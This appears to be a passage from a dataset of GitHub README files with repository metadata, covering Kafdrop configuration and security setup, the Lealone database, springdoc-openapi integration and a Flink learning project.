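        HttpRequest request = HttpRequest.newBuilder()
                .uri(URI.create(""http://localhost:9000/topic""))
                .header(""Accept"", ""application/json"")   // ask Kafdrop for JSON instead of the HTML view
                .build();
        HttpResponse<String> response = client.send(request, HttpResponse.BodyHandlers.ofString());
        System.out.println(response.body());
    }
}
```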
## OpenAPI Specification (OAS)
To help document the Kafka APIs, OpenAPI Specification (OAS) has been included. The OpenAPI Specification output is available by default at the following Kafdrop URL:
```
/v3/api-docs
```
It is also possible to access the Swagger UI (the HTML views) from the following URL:
```
/swagger-ui.html
```
This can be overridden with the following configuration:
```
springdoc.api-docs.path=/new/oas/path
```
You can disable OpenAPI Specification output with the following configuration:
```
springdoc.api-docs.enabled=false
```
## CORS Headers
Starting in version 2.0.0, Kafdrop sets CORS headers for all endpoints. You can control the CORS header values with the following configurations:
```
cors.allowOrigins (default is *)
cors.allowMethods (default is GET,POST,PUT,DELETE)
cors.maxAge (default is 3600)
cors.allowCredentials (default is true)
cors.allowHeaders (default is Origin,Accept,X-Requested-With,Content-Type,Access-Control-Request-Method,Access-Control-Request-Headers,Authorization)
```
You can also disable CORS entirely with the following configuration:
```
cors.enabled=false
```
## Topic Configuration
By default, topics can be deleted. If you don't want this feature, you can disable it with:
```
--topic.deleteEnabled=false
```
By default, topics can be created. If you don't want this feature, you can disable it with:
```
--topic.createEnabled=false
```
## Actuator
Health and info endpoints are available at the following path: `/actuator`
This can be overridden with the following configuration:
```
management.endpoints.web.base-path=
```
# Guides
## Connecting to a Secure Broker
Kafdrop supports TLS (SSL) and SASL connections for [encryption and authentication](http://kafka.apache.org/090/documentation.html#security). This can be configured by providing a combination of the following files (placed into the Kafka root directory):
* `kafka.truststore.jks`: specifying the certificate for authenticating brokers, if TLS is enabled.
* `kafka.keystore.jks`: specifying the private key to authenticate the client to the broker, if mutual TLS authentication is required.
* `kafka.properties`: specifying the necessary configuration, including key/truststore passwords, cipher suites, enabled TLS protocol versions, username/password pairs, etc. When supplying the truststore and/or keystore files, the `ssl.truststore.location` and `ssl.keystore.location` properties will be assigned automatically.
### Using Docker
The three files above can be supplied to a Docker instance in base-64-encoded form via environment variables:
```sh
docker run -d --rm -p 9000:9000 \
-e KAFKA_BROKERCONNECT= \
-e KAFKA_PROPERTIES=""$(cat kafka.properties | base64)"" \
-e KAFKA_TRUSTSTORE=""$(cat kafka.truststore.jks | base64)"" \ # optional
-e KAFKA_KEYSTORE=""$(cat kafka.keystore.jks | base64)"" \ # optional
obsidiandynamics/kafdrop
```
Rather than passing `KAFKA_PROPERTIES` as a base64-encoded string, you can also place a pre-populated `KAFKA_PROPERTIES_FILE` into the container:
```sh
cat << EOF > kafka.properties
security.protocol=SASL_SSL
sasl.mechanism=SCRAM-SHA-512
sasl.jaas.config=org.apache.kafka.common.security.scram.ScramLoginModule required username=""foo"" password=""bar""
EOF
docker run -d --rm -p 9000:9000 \
-v $(pwd)/kafka.properties:/tmp/kafka.properties:ro \
-v $(pwd)/kafka.truststore.jks:/tmp/kafka.truststore.jks:ro \
-v $(pwd)/kafka.keystore.jks:/tmp/kafka.keystore.jks:ro \
-e KAFKA_BROKERCONNECT= \
-e KAFKA_PROPERTIES_FILE=/tmp/kafka.properties \
-e KAFKA_TRUSTSTORE_FILE=/tmp/kafka.truststore.jks \ # optional
-e KAFKA_KEYSTORE_FILE=/tmp/kafka.keystore.jks \ # optional
obsidiandynamics/kafdrop
```
#### Environment Variables
##### Basic configuration
|Name |Description
|----------------------------|-------------------------------
|`KAFKA_BROKERCONNECT` |Bootstrap list of Kafka host/port pairs. Defaults to `localhost:9092`.
|`KAFKA_PROPERTIES` |Additional properties to configure the broker connection (base-64 encoded).
|`KAFKA_TRUSTSTORE` |Certificate for broker authentication (base-64 encoded). Required for TLS/SSL.
|`KAFKA_KEYSTORE` |Private key for mutual TLS authentication (base-64 encoded).
|`SERVER_SERVLET_CONTEXTPATH`|The context path to serve requests on (must end with a `/`). Defaults to `/`.
|`SERVER_PORT` |The web server port to listen on. Defaults to `9000`.
|`MANAGEMENT_SERVER_PORT` |The Spring Actuator server port to listen on. Defaults to `9000`.
|`SCHEMAREGISTRY_CONNECT` |The endpoint of the Schema Registry for Avro or Protobuf messages
|`SCHEMAREGISTRY_AUTH` |Optional basic auth credentials in the form `username:password`.
|`CMD_ARGS` |Command line arguments to Kafdrop, e.g. `--message.format` or `--protobufdesc.directory` or `--server.port`.
##### Advanced configuration
| Name |Description
|--------------------------|-------------------------------
| `JVM_OPTS` |JVM options. E.g.```JVM_OPTS: ""-Xms16M -Xmx64M -Xss360K -XX:-TieredCompilation -XX:+UseStringDeduplication -noverify""```
| `JMX_PORT` |Port to use for JMX. No default; if unspecified, JMX will not be exposed.
| `HOST` |The hostname to report for the RMI registry (used for JMX). Defaults to `localhost`.
| `KAFKA_PROPERTIES_FILE` |Internal location where the Kafka properties file will be written to (if `KAFKA_PROPERTIES` is set). Defaults to `kafka.properties`.
| `KAFKA_TRUSTSTORE_FILE` |Internal location where the truststore file will be written to (if `KAFKA_TRUSTSTORE` is set). Defaults to `kafka.truststore.jks`.
| `KAFKA_KEYSTORE_FILE` |Internal location where the keystore file will be written to (if `KAFKA_KEYSTORE` is set). Defaults to `kafka.keystore.jks`.
| `SSL_ENABLED` | Enabling HTTPS (SSL) for Kafdrop server. Default is `false`
| `SSL_KEY_STORE_TYPE` | Type of SSL keystore. Default is `PKCS12`
| `SSL_KEY_STORE` | Path to keystore file
| `SSL_KEY_STORE_PASSWORD` | Keystore password
| `SSL_KEY_ALIAS` | Key alias
### Using Helm
Like in the Docker example, supply the files in base-64 form:
```sh
helm upgrade -i kafdrop chart --set image.tag=3.x.x \
--set kafka.brokerConnect= \
--set kafka.properties=""$(cat kafka.properties | base64)"" \
--set kafka.truststore=""$(cat kafka.truststore.jks | base64)"" \
--set kafka.keystore=""$(cat kafka.keystore.jks | base64)""
```
## Updating the Bootstrap theme
Edit the `.scss` files in the `theme` directory, then run `theme/install.sh`. This will overwrite `src/main/resources/static/css/bootstrap.min.css`. Then build as usual. (Requires `npm`.)
## Securing the Kafdrop UI
Kafdrop doesn't (yet) natively implement an authentication mechanism to restrict user access. Here's a quick workaround using NGINX with Basic Auth. The instructions below are for macOS and Homebrew.
### Requirements
* NGINX: install using `which nginx > /dev/null || brew install nginx`
* Apache HTTP utilities: `which htpasswd > /dev/null || brew install httpd`
### Setup
Set the admin password (you will be prompted):
```sh
htpasswd -c /usr/local/etc/nginx/.htpasswd admin
```
Add a logout page in `/usr/local/opt/nginx/html/401.html`:
```html
```
Use the following snippet for `/usr/local/etc/nginx/nginx.conf`:
```
worker_processes 4;
events {
worker_connections 1024;
}
http {
upstream kafdrop {
server 127.0.0.1:9000;
keepalive 64;
}
server {
listen *:8080;
server_name _;
access_log /usr/local/var/log/nginx/nginx.access.log;
error_log /usr/local/var/log/nginx/nginx.error.log;
auth_basic ""Restricted Area"";
auth_basic_user_file /usr/local/etc/nginx/.htpasswd;
location / {
proxy_pass http://kafdrop;
}
location /logout {
return 401;
}
error_page 401 /errors/401.html;
location /errors {
auth_basic off;
ssi on;
alias /usr/local/opt/nginx/html;
}
}
}
```
Run NGINX:
```sh
nginx
```
Or reload its configuration if already running:
```sh
nginx -s reload
```
To logout, browse to [/logout](http://localhost:8080/logout).
> **Hey there!** We hope you really like Kafdrop! Please take a moment to [⭐](https://github.com/obsidiandynamics/kafdrop)the repo or [Tweet](https://twitter.com/intent/tweet?url=https%3A%2F%2Fgithub.com%2Fobsidiandynamics%2Fkafdrop&text=Get%20Kafdrop%20%E2%80%94%20a%20web-based%20UI%20for%20viewing%20%23ApacheKafka%20topics%20and%20browsing%20consumers%20) about it.
# Contributing Guidelines
See [here](CONTRIBUTING.md).
## Release workflow
To cut an official release, these are the steps:
1. Commit a new version on master that has the `-SNAPSHOT` suffix stripped (see `pom.xml`). Once the commit is merged, the CI will treat it as a release build, and will end up publishing more artifacts than the regular (non-release/snapshot) build. One of those will be a dockerhub push to the specific version and ""latest"" tags. (The regular build doesn't update ""latest"").
2. You can then edit the release description in GitHub to describe what went into the release.
3. After the release goes through successfully, you need to prepare the repo for the next version, which requires committing the next snapshot version on master again. So we should increment the minor version and add again the `-SNAPSHOT` suffix.
"
lealone/Lealone,master,2412,516,2013-01-08T13:57:08Z,28140,18,比 MySQL 和 MongoDB 快10倍的 OLTP 关系数据库和文档数据库,acid async database lealone microservice newsql oltp orm rdbms replication sharding sql,"
### What is Lealone
* A high-performance relational database for OLTP workloads
* Also a high-performance document database compatible with MongoDB
* Highly compatible with the MySQL and PostgreSQL protocols and SQL dialects
### Lealone features
##### Highlights
* Extremely high concurrent write performance
* Fully asynchronous end to end; a small number of threads can handle a large amount of concurrency
* A pausable, incremental SQL engine
* Preemptive scheduling based on SQL priority, so slow queries cannot hog the CPU for long
* JDBC connections are created very quickly and use few resources, so a JDBC connection pool is no longer needed
* Pluggable storage engine architecture, with the built-in AOSE engine based on a novel asynchronous B-Tree
* Pluggable transaction engine architecture that separates transaction logic from storage, with the built-in AOTE engine
* Page-level hybrid row/column storage, which saves a lot of memory when reading only a few columns from wide tables
* Hosted back-end services created with the CREATE SERVICE statement
* Runs from a single jar of less than 2 MB, with no installation required
##### Standard features
* Indexes, views, joins, subqueries, triggers, user-defined functions, Order By, Group By, aggregation
##### Cloud edition
* High-performance distributed transactions, strongly consistent replication, and global snapshot isolation
* Automatic sharding: users don't need to care about sharding rules, there are no hotspots, and range queries are supported
* Mixed deployment modes, with four options: embedded, Client/Server, replication, and sharding
* Fast manual or automatic switching between modes without downtime: Client/Server mode -> replication mode -> sharding mode
### Lealone documentation
* [Quick start](https://github.com/lealone/Lealone-Docs/blob/master/应用文档/Lealone数据库快速入门.md)
* [Documentation home](https://github.com/lealone/Lealone-Docs)
### Lealone plugins
* Plugins compatible with MongoDB, MySQL and PostgreSQL
* [Plugins home](https://github.com/lealone-plugins)
### Lealone microservice framework
* A very novel microservice framework built on database technology, making distributed microservice applications as easy to develop as monoliths
* [Microservice framework documentation](https://github.com/lealone/Lealone-Docs/blob/master/%E5%BA%94%E7%94%A8%E6%96%87%E6%A1%A3/%E5%BE%AE%E6%9C%8D%E5%8A%A1%E5%92%8CORM%E6%A1%86%E6%9E%B6%E6%96%87%E6%A1%A3.md#lealone-%E5%BE%AE%E6%9C%8D%E5%8A%A1%E6%A1%86%E6%9E%B6)
### Lealone ORM framework
* An extremely concise, type-safe ORM framework that needs no configuration files or annotations
* [ORM framework documentation](https://github.com/lealone/Lealone-Docs/blob/master/%E5%BA%94%E7%94%A8%E6%96%87%E6%A1%A3/%E5%BE%AE%E6%9C%8D%E5%8A%A1%E5%92%8CORM%E6%A1%86%E6%9E%B6%E6%96%87%E6%A1%A3.md#lealone-orm-%E6%A1%86%E6%9E%B6)
### Where the name Lealone comes from
* Lealone, pronounced ['li:ləʊn], is a word I coined. The inspiration came from the potted plants on my desk, called 绿萝 (golden pothos); I had long wanted to name a project after them.
The pinyin lv luo sounds a little like the English pronunciation of Lealone,
and Lealone is the combination lea + lone, which is even more fun read backwards. :)
### Lealone history
* Started in 2012 from the code of the [H2 database](http://www.h2database.com/html/main.html)
* [Lealone: past, present and future](https://github.com/codefollower/My-Blog/issues/16)
### [Lealone License](https://github.com/lealone/Lealone/blob/master/LICENSE.md)
"
springdoc/springdoc-openapi,main,3084,462,2019-07-11T23:08:20Z,8721,15,Library for OpenAPI 3 with spring-boot,java json-format kotlin oauth2 openapi openapi-spec openapi-specification openapi3 rest-api spring spring-boot spring-data-rest spring-hateoas spring-security spring-webflux springdoc-openapi swagger swagger-documentation swagger-ui yaml-format,"![Octocat](https://springdoc.org/img/banner-logo.svg)
[![Build Status](https://ci-cd.springdoc.org:8443/buildStatus/icon?job=springdoc-openapi-starter-IC)](https://ci-cd.springdoc.org:8443/view/springdoc-openapi/job/springdoc-openapi-starter-IC/)
[![Quality Gate](https://sonarcloud.io/api/project_badges/measure?project=springdoc_springdoc-openapi&metric=alert_status)](https://sonarcloud.io/dashboard?id=springdoc_springdoc-openapi)
[![Known Vulnerabilities](https://snyk.io/test/github/springdoc/springdoc-openapi.git/badge.svg)](https://snyk.io/test/github/springdoc/springdoc-openapi.git)
[![Stack Exchange questions](https://img.shields.io/stackexchange/stackoverflow/t/springdoc)](https://stackoverflow.com/questions/tagged/springdoc?tab=Votes)
IMPORTANT: ``springdoc-openapi v1.8.0`` is the latest Open Source release supporting Spring Boot 2.x and 1.x.
An extended support for [*springdoc-openapi v1*](https://springdoc.org/v1)
project is now available for organizations that need support beyond 2023.
For more details, feel free to reach out: [sales@springdoc.org](mailto:sales@springdoc.org)
``springdoc-openapi`` is on [Open Collective](https://opencollective.com/springdoc). If you ❤️ this project consider becoming
a [sponsor](https://github.com/sponsors/springdoc).
This project is sponsored by
# Table of Contents
- [Full documentation](#full-documentation)
- [**Introduction**](#introduction)
- [**Getting Started**](#getting-started)
- [Library for springdoc-openapi integration with spring-boot and swagger-ui](#library-for-springdoc-openapi-integration-with-spring-boot-and-swagger-ui)
- [Spring-boot with OpenAPI Demo applications.](#spring-boot-with-openapi-demo-applications)
- [Source Code for Demo Applications.](#source-code-for-demo-applications)
- [Demo Spring Boot 2 Web MVC with OpenAPI 3.](#demo-spring-boot-2-web-mvc-with-openapi-3)
- [Demo Spring Boot 2 WebFlux with OpenAPI 3.](#demo-spring-boot-2-webflux-with-openapi-3)
- [Demo Spring Boot 2 WebFlux with Functional endpoints OpenAPI 3.](#demo-spring-boot-2-webflux-with-functional-endpoints-openapi-3)
- [Demo Spring Boot 2 and Spring Hateoas with OpenAPI 3.](#demo-spring-boot-2-and-spring-hateoas-with-openapi-3)
- [Integration of the library in a Spring Boot 3.x project without the swagger-ui:](#integration-of-the-library-in-a-spring-boot-3x-project-without-the-swagger-ui)
- [Error Handling for REST using @ControllerAdvice](#error-handling-for-rest-using-controlleradvice)
- [Adding API Information and Security documentation](#adding-api-information-and-security-documentation)
- [spring-webflux support with Annotated Controllers](#spring-webflux-support-with-annotated-controllers)
- [Acknowledgements](#acknowledgements)
- [Contributors](#contributors)
- [Additional Support](#additional-support)
# [Full documentation](https://springdoc.org/)
# **Introduction**
The springdoc-openapi Java library helps automate the generation of API documentation
for Spring Boot projects.
springdoc-openapi works by examining an application at runtime to infer API semantics
based on Spring configurations, class structure and various annotations.
The library automatically generates documentation in JSON/YAML and HTML formatted pages.
The generated documentation can be complemented using `swagger-api` annotations.
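As a rough sketch of what that looks like, a plain Spring controller is documented automatically, and a `swagger-api` annotation such as `@Operation` adds to the generated description; the endpoint and names below are made up.
```java
import io.swagger.v3.oas.annotations.Operation;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class GreetingController {

    // springdoc infers the path, HTTP method and response type from the Spring annotations;
    // @Operation only adds a human-readable summary to the generated OpenAPI description.
    @Operation(summary = ""Return a fixed greeting"")
    @GetMapping(""/greeting"")
    public String greeting() {
        return ""hello"";
    }
}
```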
This library supports:
* OpenAPI 3
* Spring-boot v3 (Java 17 & Jakarta EE 9)
* JSR-303, specifically for @NotNull, @Min, @Max, and @Size.
* Swagger-ui
* OAuth 2
* GraalVM native images
The following video introduces the Library:
* [https://youtu.be/utRxyPfFlDw](https://youtu.be/utRxyPfFlDw)
For *spring-boot v3* support, make sure you use [springdoc-openapi v2](https://springdoc.org/)
This is a community-based project, not maintained by the Spring Framework Contributors (Pivotal)
# **Getting Started**
## Library for springdoc-openapi integration with spring-boot and swagger-ui
* Automatically deploys swagger-ui to a Spring Boot 3.x application
* Documentation will be available in HTML format, using the
official [swagger-ui jars](https://github.com/swagger-api/swagger-ui.git).
* The Swagger UI page should then be available at http://server:port/context-path/swagger-ui.html and the OpenAPI description will be available at the following url for json format: http://server:port/context-path/v3/api-docs
* `server`: The server name or IP
* `port`: The server port
* `context-path`: The context path of the application
* Documentation can be available in yaml format as well, on the following path:
`/v3/api-docs.yaml`
* Add the `springdoc-openapi-starter-webmvc-ui` library to the list of your project dependencies (no
  additional configuration is needed):
```xml
   <dependency>
      <groupId>org.springdoc</groupId>
      <artifactId>springdoc-openapi-starter-webmvc-ui</artifactId>
      <version>last-release-version</version>
   </dependency>
```
* This step is optional: to customize the path of the swagger documentation in HTML format, add
  a custom springdoc property to your spring-boot configuration file:
```properties
# swagger-ui custom path
springdoc.swagger-ui.path=/swagger-ui.html
```
## Spring-boot with OpenAPI Demo applications.
### [Source Code for Demo Applications](https://github.com/springdoc/springdoc-openapi-demos/tree/master).
## [Demo Spring Boot 3 Web MVC with OpenAPI 3](https://demos.springdoc.org/demo-spring-boot-3-webmvc).
## [Demo Spring Boot 3 WebFlux with OpenAPI 3](https://demos.springdoc.org/demo-spring-boot-3-webflux/swagger-ui.html).
## [Demo Spring Boot 3 WebFlux with Functional endpoints OpenAPI 3](https://demos.springdoc.org/demo-spring-boot-3-webflux-functional/swagger-ui.html).
## [Demo Spring Boot 3 and Spring Cloud Function Web MVC](https://demos.springdoc.org/spring-cloud-function-webmvc).
## [Demo Spring Boot 3 and Spring Cloud Function WebFlux](http://158.101.191.70:8085/swagger-ui.html).
## [Demo Spring Boot 3 and Spring Cloud Gateway](https://demos.springdoc.org/demo-microservices/swagger-ui.html).
![Branching](https://springdoc.org/img/pets.png)
## Integration of the library in a Spring Boot 3.x project without the swagger-ui:
* Documentation will be available at the following url for json format: http://server:port/context-path/v3/api-docs
* `server`: The server name or IP
* `port`: The server port
* `context-path`: The context path of the application
* Documentation will be available in yaml format as well, on the following path: `/v3/api-docs.yaml`
* Add the library to the list of your project dependencies. (No additional configuration
is needed)
```xml
   <dependency>
      <groupId>org.springdoc</groupId>
      <artifactId>springdoc-openapi-starter-webmvc-api</artifactId>
      <version>last-release-version</version>
   </dependency>
```
* This step is optional: to customize the path of the OpenAPI documentation in JSON format, add
  a custom springdoc property to your spring-boot configuration file:
```properties
# /api-docs endpoint custom path
springdoc.api-docs.path=/api-docs
```
* This step is optional: if you want to disable the `springdoc-openapi` endpoints, add a
  custom springdoc property to your `spring-boot` configuration file:
```properties
# disable api-docs
springdoc.api-docs.enabled=false
```
## Error Handling for REST using @ControllerAdvice
To generate documentation automatically, make sure all of your handler methods declare their HTTP
response codes using the `@ResponseStatus` annotation.
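A minimal sketch, assuming hypothetical handler and payload names, of a `@RestControllerAdvice` whose handlers declare their HTTP codes with `@ResponseStatus` so springdoc can list them as documented error responses:
```java
import java.util.NoSuchElementException;

import org.springframework.http.HttpStatus;
import org.springframework.web.bind.annotation.ExceptionHandler;
import org.springframework.web.bind.annotation.ResponseStatus;
import org.springframework.web.bind.annotation.RestControllerAdvice;

// Hypothetical global error handler: the @ResponseStatus annotations tell
// springdoc which HTTP codes to document for the handled exceptions.
@RestControllerAdvice
public class GlobalErrorHandler {

    // Simple error payload returned by the handlers below.
    record ErrorMessage(String message) {}

    @ResponseStatus(HttpStatus.NOT_FOUND)
    @ExceptionHandler(NoSuchElementException.class)
    public ErrorMessage handleNotFound(NoSuchElementException ex) {
        return new ErrorMessage(ex.getMessage());
    }

    @ResponseStatus(HttpStatus.BAD_REQUEST)
    @ExceptionHandler(IllegalArgumentException.class)
    public ErrorMessage handleBadRequest(IllegalArgumentException ex) {
        return new ErrorMessage(ex.getMessage());
    }
}
```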
## Adding API Information and Security documentation
The library scans the spring-boot application's auto-configured packages for the
following annotations on spring beans: `@OpenAPIDefinition` and `@Info`.
These annotations declare API information: title, version, license, security, servers,
tags and externalDocs.
For better performance of documentation generation, declare `@OpenAPIDefinition`
and `@SecurityScheme` annotations within a Spring managed bean.
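A minimal sketch, assuming a hypothetical API title and security scheme name, of declaring both annotations on a Spring-managed `@Configuration` bean:
```java
import io.swagger.v3.oas.annotations.OpenAPIDefinition;
import io.swagger.v3.oas.annotations.enums.SecuritySchemeType;
import io.swagger.v3.oas.annotations.info.Info;
import io.swagger.v3.oas.annotations.info.License;
import io.swagger.v3.oas.annotations.security.SecurityScheme;
import org.springframework.context.annotation.Configuration;

// Hypothetical configuration bean: declaring @OpenAPIDefinition and
// @SecurityScheme on a Spring-managed bean lets springdoc pick them up
// without scanning every package.
@Configuration
@OpenAPIDefinition(
        info = @Info(
                title = "Pet API",
                version = "1.0",
                license = @License(name = "Apache 2.0", url = "https://www.apache.org/licenses/LICENSE-2.0")))
@SecurityScheme(
        name = "bearerAuth",
        type = SecuritySchemeType.HTTP,
        scheme = "bearer",
        bearerFormat = "JWT")
public class OpenApiConfig {
}
```
REST operations can then reference the scheme by name, for example with `@SecurityRequirement(name = "bearerAuth")` on a controller method.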
## spring-webflux support with Annotated Controllers
* Documentation is available in yaml format as well, on the following path: `/v3/api-docs.yaml`
* Add the library to the list of your project dependencies (No additional configuration
is needed)
```xml
   <dependency>
      <groupId>org.springdoc</groupId>
      <artifactId>springdoc-openapi-starter-webflux-ui</artifactId>
      <version>last-release-version</version>
   </dependency>
```
* This step is optional: to customize the path of the swagger documentation in HTML format, add
  a custom springdoc property to your spring-boot configuration file:
```properties
# swagger-ui custom path
springdoc.swagger-ui.path=/swagger-ui.html
```
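As an illustration (controller and model names are hypothetical), springdoc documents annotated WebFlux controllers the same way as Web MVC ones, unwrapping the reactive return types:
```java
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import reactor.core.publisher.Flux;
import reactor.core.publisher.Mono;

// Hypothetical annotated reactive controller: springdoc unwraps the Mono/Flux
// return types and documents the Pet payload in the generated OpenAPI description.
@RestController
@RequestMapping("/pets")
public class PetController {

    record Pet(String id, String name) {}

    @GetMapping
    public Flux<Pet> listPets() {
        return Flux.just(new Pet("1", "Rex"), new Pet("2", "Milo"));
    }

    @GetMapping("/{id}")
    public Mono<Pet> getPet(@PathVariable String id) {
        return Mono.just(new Pet(id, "Rex"));
    }
}
```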
The `springdoc-openapi` libraries are hosted on the Maven Central repository.
The artifacts can be accessed at the following locations:
Releases:
* [https://s01.oss.sonatype.org/content/groups/public/org/springdoc/](https://s01.oss.sonatype.org/content/groups/public/org/springdoc/)
Snapshots:
* [https://s01.oss.sonatype.org/content/repositories/snapshots/org/springdoc/](https://s01.oss.sonatype.org/content/repositories/snapshots/org/springdoc/)
# Acknowledgements
## Contributors
springdoc-openapi is relevant and updated regularly due to the valuable contributions from
its [contributors](https://github.com/springdoc/springdoc-openapi/graphs/contributors).
Thank you all for your support!
## Additional Support
* [Spring Team](https://spring.io/team) - Thanks for their support by sharing all relevant
resources around Spring projects.
* [JetBrains](https://www.jetbrains.com/?from=springdoc-openapi) - Thanks a lot for
supporting springdoc-openapi project.
![JetBrains logo](https://springdoc.org/img/jetbrains.svg)
"
zhisheng17/flink-learning,master,14247,3854,2019-01-01T07:38:28Z,43599,0,flink learning blog. http://www.54tianzhisheng.cn/ 含 Flink 入门、概念、原理、实战、性能调优、源码解析等内容。涉及 Flink Connector、Metrics、Library、DataStream API、Table API & SQL 等内容的学习案例,还有 Flink 落地应用的大型项目案例(PVUV、日志存储、百亿数据实时去重、监控告警)分享。欢迎大家支持我的专栏《大数据实时计算引擎 Flink 实战与性能优化》,clickhouse elasticsearch flink hbase influxdb kafka loki mysql opentsdb rabbitmq redis rocketmq spark stream-processing streaming,"# Flink 学习
If you are passing by, please give this project a star — writing all of this was not easy, and a star is real encouragement to keep going! Special thanks to [JetBrains](https://jb.gg/OpenSourceSupport) for providing their full suite of tools for free, 🙏🙏🙏!
![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-05-25-124027.jpg)
## Stargazers over time
![Stargazers over time](https://starchart.cc/zhisheng17/flink-learning.svg)
## Project structure
![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/2020-01-11-064410.png)
## How to build
You may want to add the Aliyun central mirror to the `mirrors` section of your Maven `settings.xml`:
```xml
<mirror>
    <id>alimaven</id>
    <mirrorOf>central</mirrorOf>
    <name>aliyun maven</name>
    <url>https://maven.aliyun.com/repository/central</url>
</mirror>
```
Then run the following command:
```
mvn clean package -Dmaven.test.skip=true
```
You should see the following output if the build succeeds.
![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-09-27-121923.jpg)
## Flink column
A column based on Flink 1.9, covering getting started, concepts, internals, hands-on practice, performance tuning and system case studies. Scan the QR code below to subscribe.
![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-11-05-044731.jpg)
First published at: [http://www.54tianzhisheng.cn/2019/11/15/flink-in-action/](http://www.54tianzhisheng.cn/2019/11/15/flink-in-action/)
Column address: [https://gitbook.cn/gitchat/column/5dad4a20669f843a1a37cb4f](https://gitbook.cn/gitchat/column/5dad4a20669f843a1a37cb4f)
## Change
**2022/02/26** Moved my column 《Flink 实战与性能优化》 (Flink in Action and Performance Tuning) to GitHub; see the `books` directory.
**2021/12/18** Upgraded the project's Flink version to 1.14.2; check the older branches if you need a previous version.
**2021/08/15** Upgraded the project's Flink version to 1.13.2. The API changed significantly, so the code structure was adjusted accordingly (some code was removed from the master branch; the previous code was moved to [feature/flink-1.10.0](https://github.com/zhisheng17/flink-learning/tree/feature/flink-1.10.0), so check that branch if you need it).
**2020/02/16** Upgraded the project's Flink version to 1.10. All code in this version has been tested and runs successfully, so prefer it as a reference. If the code fails on your cluster, check whether your Flink version matches and whether there are dependency conflicts.
**2019/09/06** Upgraded the project's Flink version to 1.9.0, with some changes. As discussed in the group, the Flink 1.8.0 code is kept on the [feature/flink-1.8.0](https://github.com/zhisheng17/flink-learning/tree/feature/flink-1.8.0) branch for those who need it.
**2019/06/08** Four Flink books:
+ [Introduction_to_Apache_Flink_book.pdf]() A thin, introductory book; a Chinese translation has been published.
+ [Learning Apache Flink.pdf]() Fairly basic, good for beginners.
+ [Stream Processing with Apache Flink.pdf]() Written by Flink PMC members.
+ [Streaming System.pdf]() An exceptionally well-regarded book.
**2019/06/09** Added papers on stream processing engines under the `paper` directory:
+ [Stream processing engine papers](./paper/paper.md)
**Note**: the book downloads have been removed because of copyright issues; switch to an older branch if you need them.
## Blog posts
1、[Flink 从0到1学习 —— Apache Flink 介绍](http://www.54tianzhisheng.cn/2018/10/13/flink-introduction/)
2、[Flink 从0到1学习 —— Mac 上搭建 Flink 1.6.0 环境并构建运行简单程序入门](http://www.54tianzhisheng.cn/2018/09/18/flink-install)
3、[Flink 从0到1学习 —— Flink 配置文件详解](http://www.54tianzhisheng.cn/2018/10/27/flink-config/)
4、[Flink 从0到1学习 —— Data Source 介绍](http://www.54tianzhisheng.cn/2018/10/28/flink-sources/)
5、[Flink 从0到1学习 —— 如何自定义 Data Source ?](http://www.54tianzhisheng.cn/2018/10/30/flink-create-source/)
6、[Flink 从0到1学习 —— Data Sink 介绍](http://www.54tianzhisheng.cn/2018/10/29/flink-sink/)
7、[Flink 从0到1学习 —— 如何自定义 Data Sink ?](http://www.54tianzhisheng.cn/2018/10/31/flink-create-sink/)
8、[Flink 从0到1学习 —— Flink Data transformation(转换)](http://www.54tianzhisheng.cn/2018/11/04/Flink-Data-transformation/)
9、[Flink 从0到1学习 —— 介绍 Flink 中的 Stream Windows](http://www.54tianzhisheng.cn/2018/12/08/Flink-Stream-Windows/)
10、[Flink 从0到1学习 —— Flink 中的几种 Time 详解](http://www.54tianzhisheng.cn/2018/12/11/Flink-time/)
11、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 ElasticSearch](http://www.54tianzhisheng.cn/2018/12/30/Flink-ElasticSearch-Sink/)
12、[Flink 从0到1学习 —— Flink 项目如何运行?](http://www.54tianzhisheng.cn/2019/01/05/Flink-run/)
13、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Kafka](http://www.54tianzhisheng.cn/2019/01/06/Flink-Kafka-sink/)
14、[Flink 从0到1学习 —— Flink JobManager 高可用性配置](http://www.54tianzhisheng.cn/2019/01/13/Flink-JobManager-High-availability/)
15、[Flink 从0到1学习 —— Flink parallelism 和 Slot 介绍](http://www.54tianzhisheng.cn/2019/01/14/Flink-parallelism-slot/)
16、[Flink 从0到1学习 —— Flink 读取 Kafka 数据批量写入到 MySQL](http://www.54tianzhisheng.cn/2019/01/15/Flink-MySQL-sink/)
17、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 RabbitMQ](https://t.zsxq.com/uVbi2nq)
18、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 HBase](https://t.zsxq.com/zV7MnuJ)
19、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 HDFS](https://t.zsxq.com/zV7MnuJ)
20、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Redis](https://t.zsxq.com/zV7MnuJ)
21、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Cassandra](https://t.zsxq.com/uVbi2nq)
22、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Flume](https://t.zsxq.com/zV7MnuJ)
23、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 InfluxDB](https://t.zsxq.com/zV7MnuJ)
24、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 RocketMQ](https://t.zsxq.com/zV7MnuJ)
25、[Flink 从0到1学习 —— 你上传的 jar 包藏到哪里去了](https://t.zsxq.com/uniY7mm)
26、[Flink 从0到1学习 —— 你的 Flink job 日志跑到哪里去了](https://t.zsxq.com/zV7MnuJ)
### Flink source code project structure
![](./pics/Flink-code.png)
## Learning materials
I have also compiled some Flink learning materials, all of which are now published on my WeChat official account.
Add me on WeChat (**yuanblog_tzs**) and reply with the keyword **Flink** to get them for free. Please contact me for authorization before republishing; violations will be pursued.
![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-09-17-143454.jpg)
